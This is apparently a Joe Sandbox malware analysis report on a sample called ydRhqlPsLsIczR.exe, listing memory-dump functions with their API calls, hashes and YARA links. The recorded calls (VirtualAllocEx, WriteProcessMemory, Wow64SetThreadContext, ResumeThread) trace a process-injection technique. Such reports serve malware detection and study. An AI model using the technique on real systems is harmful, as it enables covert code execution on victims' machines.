Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: CreateProcess
String ID: S{
API String ID: 963392458-395883740
Opcode ID: 7896fd309a56da4021d7e7283922a37c83e7ee8d380bcb1cc47269fc28bf46b3
Instruction ID: 7815d6b2111953ef59543cbed9c915f10e92e633ac00681947d562dbb20c2f00
Opcode Fuzzy Hash: 7896fd309a56da4021d7e7283922a37c83e7ee8d380bcb1cc47269fc28bf46b3
Instruction Fuzzy Hash: B0915BB1D0071ADFEB11DFA8C8417EEBBB2BF44311F148569E808A7290DB749995CF91

Function 00E4AE59 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B0BE

Strings

S{, xrefs: 00E4B077

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: HandleModule
String ID: S{
API String ID: 4139908857-395883740
Opcode ID: a32c6582cee27fea4ace15313d8f261e6614f949f36643cc736f250e96842bfd
Instruction ID: 82207508440956fe69bd5028e0c3c1759461581b98853907bbf988517271e167
Opcode Fuzzy Hash: a32c6582cee27fea4ace15313d8f261e6614f949f36643cc736f250e96842bfd
Instruction Fuzzy Hash: EE91BD70A00B458FE725DF2AE44079ABBF1FF84314F04492EE09AEBA51D775E849CB91

Function 00E4590D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E459C9

Strings

S{, xrefs: 00E4594C

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: Create
String ID: S{
API String ID: 2289755597-395883740
Opcode ID: 1124b459f253d491e53295836397851e3994eba3170a4c002bfba6933289faa9
Instruction ID: e78b024dc26b834ad03a6538cbf8c416e8e98c6c51ca62f9cd5d1e9b3d870519
Opcode Fuzzy Hash: 1124b459f253d491e53295836397851e3994eba3170a4c002bfba6933289faa9
Instruction Fuzzy Hash: 9341E0B1C00719CBEB24DFAAC8847CEBBB5BF89704F60816AD418AB251DB756946CF50

Function 00E444E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E459C9

Strings

S{, xrefs: 00E4594C

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: Create
String ID: S{
API String ID: 2289755597-395883740
Opcode ID: 2add2c317b1aea6bfcbc0279b6aef43e6ad19522afd402aa0b1b61693f6f5350
Instruction ID: 0487ec7008a671e2936517186bae07f78f162406aae7668a978a7ac9969e7546
Opcode Fuzzy Hash: 2add2c317b1aea6bfcbc0279b6aef43e6ad19522afd402aa0b1b61693f6f5350
Instruction Fuzzy Hash: 6941EF71C00718CBEB24DFA9D884BCEBBF5BF89704F20816AD418AB251DB756945CF90

Function 071450E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07145178

Strings

S{, xrefs: 07145107

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: S{
API String ID: 3559483778-395883740
Opcode ID: 5a65fc4c5e780a9710945f01eb20949b9e09bd6bf56184314280bd14d80c3a46
Instruction ID: 7d2755cc455001dd68cbe1efca57237876d1c1a74263a9b1058e4993a499e842
Opcode Fuzzy Hash: 5a65fc4c5e780a9710945f01eb20949b9e09bd6bf56184314280bd14d80c3a46
Instruction Fuzzy Hash: 7B2127B59003599FDB10CFA9C980BEEBBF5FF48310F14842AE919A7250C7789955CBA4

Function 071450E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07145178

Strings

S{, xrefs: 07145107

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: S{
API String ID: 3559483778-395883740
Opcode ID: 634f3d772db1779342466603c5bc9a22b25802e8b0ea2cc0e0ba042797dd38a4
Instruction ID: 8c280dbbaadcd3552535ec52880f4ccc48429791b5042edc6b77c6939ae92aac
Opcode Fuzzy Hash: 634f3d772db1779342466603c5bc9a22b25802e8b0ea2cc0e0ba042797dd38a4
Instruction Fuzzy Hash: 3C2125B590034D9FDB10CFAAC881BDEBBF5FF48310F10842AE918A7240C7789950CBA4

Function 071451D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07145258

Strings

S{, xrefs: 071451F7

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MemoryProcessRead
String ID: S{
API String ID: 1726664587-395883740
Opcode ID: 8a8a70461e686491b8161e32fff30f376e2c9522e140b7a75e517bba89f65214
Instruction ID: 6ce41cfa6069039ed3f6f112687d50701ec4600eb6fc33eb636604de35787dc6
Opcode Fuzzy Hash: 8a8a70461e686491b8161e32fff30f376e2c9522e140b7a75e517bba89f65214
Instruction Fuzzy Hash: 2E2125B18013499FDB10CFAAC881BEEBBF5FF48310F14882AE529A7640C7789510CFA4

Function 07144F49 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07144FCE

Strings

S{, xrefs: 07144F6C

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: ContextThreadWow64
String ID: S{
API String ID: 983334009-395883740
Opcode ID: 2db83aa2e30dc2cb4e02ffc2e090ee51f6097af632b0b5447e3683cfb7cdd8e6
Instruction ID: 14ce80a238e192be808fb64e270951f875ab11a28d55d2e6d4684bca62cb23e5
Opcode Fuzzy Hash: 2db83aa2e30dc2cb4e02ffc2e090ee51f6097af632b0b5447e3683cfb7cdd8e6
Instruction Fuzzy Hash: 76213AB5D003098FDB10DFAAC4857EEBBF5AF88214F14842AE419A7240D7789545CFA5

Function 00E4D738 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E4D7C7

Strings

S{, xrefs: 00E4D75F

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DuplicateHandle
String ID: S{
API String ID: 3793708945-395883740
Opcode ID: 1bdc420eac3ef1e699c0ced857a44794d37f5015fcb46f746e52382584f9776e
Instruction ID: 156e22640325d9346fee130f562310103ba1bc8cc68dcd120bf2583358ef1541
Opcode Fuzzy Hash: 1bdc420eac3ef1e699c0ced857a44794d37f5015fcb46f746e52382584f9776e
Instruction Fuzzy Hash: 8221E6B5900248AFDB10CFAAD884BDEBFF4EB48714F14841AE958A7350C374A954CFA5

Function 07144F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07144FCE

Strings

S{, xrefs: 07144F6C

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: ContextThreadWow64
String ID: S{
API String ID: 983334009-395883740
Opcode ID: 21432978a8f4b7025fce60ad577b7330656ccd145efc10cb727433f98b675735
Instruction ID: e6aa7d71bb382cade9fd221873ed852ef52a74779f6215d18aa973e6af55f13c
Opcode Fuzzy Hash: 21432978a8f4b7025fce60ad577b7330656ccd145efc10cb727433f98b675735
Instruction Fuzzy Hash: D2213BB1D003498FDB10DFAAC4857EEBBF4EF48314F14842AE959A7240C7789945CFA5

Function 071451D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07145258

Strings

S{, xrefs: 071451F7

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MemoryProcessRead
String ID: S{
API String ID: 1726664587-395883740
Opcode ID: 9c396b9a431c6d807df7608ba6fe6f74d20fa0ebc9d65577ad6950dc3533d1c0
Instruction ID: a4012e5c93d4ad357e3646b1ca354cb34158237568bc35cb96527a1ca27a5e54
Opcode Fuzzy Hash: 9c396b9a431c6d807df7608ba6fe6f74d20fa0ebc9d65577ad6950dc3533d1c0
Instruction Fuzzy Hash: 082128B180034D9FDB10DFAAC881BDEBBF5FF48310F10842AE919A7240C7789510CBA4

Function 00E4D740 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E4D7C7

Strings

S{, xrefs: 00E4D75F

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DuplicateHandle
String ID: S{
API String ID: 3793708945-395883740
Opcode ID: 88ebe638bd8491e7da9486f89b3eb9c44dbe1c194dfc549963c064afbaa528b3
Instruction ID: 77a086ae17571837172c10c4cb6763ab7f82ddced2ae979bacd3930dce8ab9a8
Opcode Fuzzy Hash: 88ebe638bd8491e7da9486f89b3eb9c44dbe1c194dfc549963c064afbaa528b3
Instruction Fuzzy Hash: 3521C2B59002489FDB10CFAAD884BDEBBF9EB48714F14841AE918A3350D378A944CFA5

Function 07145020 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07145096

Strings

S{, xrefs: 0714503F

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: AllocVirtual
String ID: S{
API String ID: 4275171209-395883740
Opcode ID: 09c14306ff2b348d8731440e409e9a9dd35c83d10e786c62cb5a2dfcd31fe1e7
Instruction ID: d88bb4e9f097f0ac4673120aa0382da36f1f968f3f39d28503ac285a12925855
Opcode Fuzzy Hash: 09c14306ff2b348d8731440e409e9a9dd35c83d10e786c62cb5a2dfcd31fe1e7
Instruction Fuzzy Hash: 9F1159768002499FDB20DFA9C844BDFBBF6AF88310F24881AE419A7650C7759951CFA0

Function 07144E98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07144F02

Strings

S{, xrefs: 07144EB7

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: ResumeThread
String ID: S{
API String ID: 947044025-395883740
Opcode ID: 53ce26eadf705f95ca3e40e507cb7388d4929d4b8c478e7545f9ced1942540db
Instruction ID: fcf053392b9dc28684ce4e17780779b6b7171056f06142ef04952d529b580d6e
Opcode Fuzzy Hash: 53ce26eadf705f95ca3e40e507cb7388d4929d4b8c478e7545f9ced1942540db
Instruction Fuzzy Hash: C2115BB5D043498FDB20DFAAC4457DFFBF9AF88214F24841AD419A7240CB759940CBA5

Function 07145028 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07145096

Strings

S{, xrefs: 0714503F

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: AllocVirtual
String ID: S{
API String ID: 4275171209-395883740
Opcode ID: 917a9a5871716556fba15de07479a8688136f1f9e35c9320435659544e0f4d82
Instruction ID: 2cce7d58924c2cd3533834a362c01d8da711a8f95d9da8bc1e2ec26c06c53f88
Opcode Fuzzy Hash: 917a9a5871716556fba15de07479a8688136f1f9e35c9320435659544e0f4d82
Instruction Fuzzy Hash: A41137768003499FDB20DFAAC844BDFBBF5EF88310F14881AE529A7250C7759950CFA4

Function 07144EA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07144F02

Strings

S{, xrefs: 07144EB7

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: ResumeThread
String ID: S{
API String ID: 947044025-395883740
Opcode ID: 05f1e54acd654c8f4238f81beeb1d856251b60255d93b4443333f602ebb22e5d
Instruction ID: 9459c24f22d1d44ac2a71496085fbf6520a3e76346d905c7158aa4c3b64c4fcf
Opcode Fuzzy Hash: 05f1e54acd654c8f4238f81beeb1d856251b60255d93b4443333f602ebb22e5d
Instruction Fuzzy Hash: AE113AB1D047498FDB10DFAAC4457DEFBF5AF88214F14841AD419A7240C779A940CFA4

Function 07146748 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071489B5

Strings

S{, xrefs: 07148972

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MessagePost
String ID: S{
API String ID: 410705778-395883740
Opcode ID: 4768e7f036cbe1b888dde62181da6ab51ae2bec8ad06381dd4954bf2ee766148
Instruction ID: 01d1d3db3c78dc118ac230f398fb31a60e9c859003dd7bc401ff73c24173a017
Opcode Fuzzy Hash: 4768e7f036cbe1b888dde62181da6ab51ae2bec8ad06381dd4954bf2ee766148
Instruction Fuzzy Hash: CD1103B58007499FDB10DF9AC885BDEBBF8EB48314F10881AE518A7340C375A944CFA1

Function 00E4B058 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B0BE

Strings

S{, xrefs: 00E4B077

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: HandleModule
String ID: S{
API String ID: 4139908857-395883740
Opcode ID: 5ed927da0dd6299682de5274f75db52f06f79041877de43b4a65b0318cfff3a4
Instruction ID: cfa38c15a93e0b182d4e64f77516adade6d162aaf96e626532907e35e686054a
Opcode Fuzzy Hash: 5ed927da0dd6299682de5274f75db52f06f79041877de43b4a65b0318cfff3a4
Instruction Fuzzy Hash: 1E11DFB5C006498FDB24CFAAD444BDEFBF4AF88314F10841AD429A7650D379A545CFA1

Function 07148951 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071489B5

Strings

S{, xrefs: 07148972

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MessagePost
String ID: S{
API String ID: 410705778-395883740
Opcode ID: 3ca8967dbebf10b1e20ac2c4134291823e4dd872400806b387af01550fe3d344
Instruction ID: 7af9686b0fbf38dd034beaf72b0ef181518f5e5fe11b921d929cdfe966a481ca
Opcode Fuzzy Hash: 3ca8967dbebf10b1e20ac2c4134291823e4dd872400806b387af01550fe3d344
Instruction Fuzzy Hash: 5F1103B5800649DFDB10DF9AD985BDEFBF8FB48314F10880AE468A7640C3B5A544CFA1

Function 00DED1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1797686716.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe504a4ffae5cc30be9ab7d0687fbb484089207e4cabc8e17ff358210ba16ae
Instruction ID: 689efb8c01dd127cccf2a77a161fc6a52a36465a9f7879beb0037703a082274d
Opcode Fuzzy Hash: dfe504a4ffae5cc30be9ab7d0687fbb484089207e4cabc8e17ff358210ba16ae
Instruction Fuzzy Hash: 52210671504280EFDF05EF51D9C0B26BBA6FB88314F24C569EA490B246C736D816CBB1

Function 00DED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1797686716.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f0b4844e4e80240c44347701cfaab50df54d869433968948d2a492b209ab19
Instruction ID: b37f5bb9915984b34a96914065367121aac86fef2e22b3333fc25379efde7059
Opcode Fuzzy Hash: a3f0b4844e4e80240c44347701cfaab50df54d869433968948d2a492b209ab19
Instruction Fuzzy Hash: 66212572504280EFDB05EF10D9C0B26BFA6FB98318F24C569E8490B256C736D856CBB2

Function 00DFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1812251297.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfd000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f3d7ea4944def66d0b4dbc8fef114b81c9a8492604ebedd8c64869501011635
Instruction ID: 00ea6965c2c65f81f8414cf9d518653d9bc1bacf8860fd106c6b123c0b4076ed
Opcode Fuzzy Hash: 5f3d7ea4944def66d0b4dbc8fef114b81c9a8492604ebedd8c64869501011635
Instruction Fuzzy Hash: 6421F571504348EFDB14DF10D5C4B26BBA7FB84314F24C569EA494B286CB36D847CA72

Function 00DFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1812251297.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfd000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d98a19b59c9cc28c1caa373d6de0cc3a68f67455df87b453d49bce0edd927d
Instruction ID: 5826447484d499beb9fca2eb539d705a091c8a8757835a39b1153ba610c4d509
Opcode Fuzzy Hash: e4d98a19b59c9cc28c1caa373d6de0cc3a68f67455df87b453d49bce0edd927d
Instruction Fuzzy Hash: 9421F271504308EFDB05DF10D9C0B26BBA7FB84314F24C56DEA494B296C336D846CAB1

Function 00DFD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1812251297.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfd000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b96fada8258e97097eaf60075c09cf5a555c2a4c8261c055a27b592a0264016a
Instruction ID: 414e383a917392155c0fcadb7bad3c86890ac1a57c01a818abda091a6a2b1c8f
Opcode Fuzzy Hash: b96fada8258e97097eaf60075c09cf5a555c2a4c8261c055a27b592a0264016a
Instruction Fuzzy Hash: A6219F755093C48FCB02CF20D994715BF72EB46314F29C5EAD9498F6A7C33A980ACB62

Function 00DED1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1797686716.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92198a4f948beed57c56698445cc2df5a183246ccdbdf080b2d23d8759be0f25
Instruction ID: bbb90f6177f942b2404dd5f1f8c1d0d2e8e3953239f04862c846343a27f91f93
Opcode Fuzzy Hash: 92198a4f948beed57c56698445cc2df5a183246ccdbdf080b2d23d8759be0f25
Instruction Fuzzy Hash: 2521B176504280DFCB06DF50D9C4B16BF72FB84314F28C5A9DD090B656C33AD86ACBA1

Function 00DED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1797686716.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: b26e3a75d7b9ec7f7167ae53f13213982bd721160aaed2e1cbd10dd417ae4127
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 3711E676504280CFCB15DF10D9C4B16BF72FB94318F28C6A9D8490B656C336D85ACBA1

Function 00DFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1812251297.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfd000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: 86afecf8e6ffc5a2f44020e6107d8cac5acc54b3dafbbd708cf7d62de250a0c2
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: 4D119D75504284DFCB16CF10D5C4B25FBB2FB84318F28C6AED9494B696C33AD84ACBA1

Function 00DED745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1797686716.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea48ff06e5464b2dffe7494ac502aceeec933400fff39d548915cb50b89369c
Instruction ID: e08c67ef2ebc2e0c58c897ff4fa6becf10e14356b4661a187faa902b49597466
Opcode Fuzzy Hash: 6ea48ff06e5464b2dffe7494ac502aceeec933400fff39d548915cb50b89369c
Instruction Fuzzy Hash: 4101F7710047809BE7207F22CC84B66BBD9DF41724F18C51AED5A0B282CB799840CA71

Function 00DED744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1797686716.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a0bc093f061bfc27a28e6bf85d91e0bbc5de71008fbfa1ab704035470c4eda
Instruction ID: 3a6754c74c57db47761b380f0d5fee993e1f384d6ef2f6c4bc7ded8604af7053
Opcode Fuzzy Hash: 13a0bc093f061bfc27a28e6bf85d91e0bbc5de71008fbfa1ab704035470c4eda
Instruction Fuzzy Hash: 40F0C2710047849EE710AF16C884B62FFD8EB41734F18C05AED090B286C6799C40CAB1

Non-executed Functions

Function 06B0EE6A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000003B), ref: 06B0EEC6
GetSystemMetrics.USER32(0000003C), ref: 06B0EF00

Strings

S{, xrefs: 06B0EE8F

Memory Dump Source

Source File: 0000000A.00000002.1934227239.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b00000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MetricsSystem
String ID: S{
API String ID: 4116985748-395883740
Opcode ID: fd7501fb6a87e2f8519e8e37a968f9c1c171f0af3ff684a4ce23f7256a062d93
Instruction ID: c7e64440faedf892caf7e956aa10fd2d0171354f44a7392c5d42cc89a71b5e63
Opcode Fuzzy Hash: fd7501fb6a87e2f8519e8e37a968f9c1c171f0af3ff684a4ce23f7256a062d93
Instruction Fuzzy Hash: 292148B18043498FEB11CF9AD4497AEBFF4EB49314F24884AE159A7780C378A585CFA5

Function 06B0EF4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000022), ref: 06B0EF9E
GetSystemMetrics.USER32(00000023), ref: 06B0EFD8

Strings

S{, xrefs: 06B0EF67

Memory Dump Source

Source File: 0000000A.00000002.1934227239.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b00000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: MetricsSystem
String ID: S{
API String ID: 4116985748-395883740
Opcode ID: 1a4555a953b3aa0a5326319c48020f79c8608dfc6af63365efb699465ff4c8aa
Instruction ID: 72da11b649b5e8ff11a5e87036a377d5dcc8c8745523654ff9da2f0358934c85
Opcode Fuzzy Hash: 1a4555a953b3aa0a5326319c48020f79c8608dfc6af63365efb699465ff4c8aa
Instruction Fuzzy Hash: 732137B1C043499FEB11CF9AD4497AEBFF4EB48314F248459D558A7290C3B8A585CFA1

Analysis Process: ydRhqlPsLsIczR.exePID: 900, Parent PID: 4420COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 011E2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011FFD4F,000000FF,00000024,01296634,00000004,00000000,?,-00000018,7D810F61,?,?,011B8B12,?,?,?,?), ref: 011E2C24

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
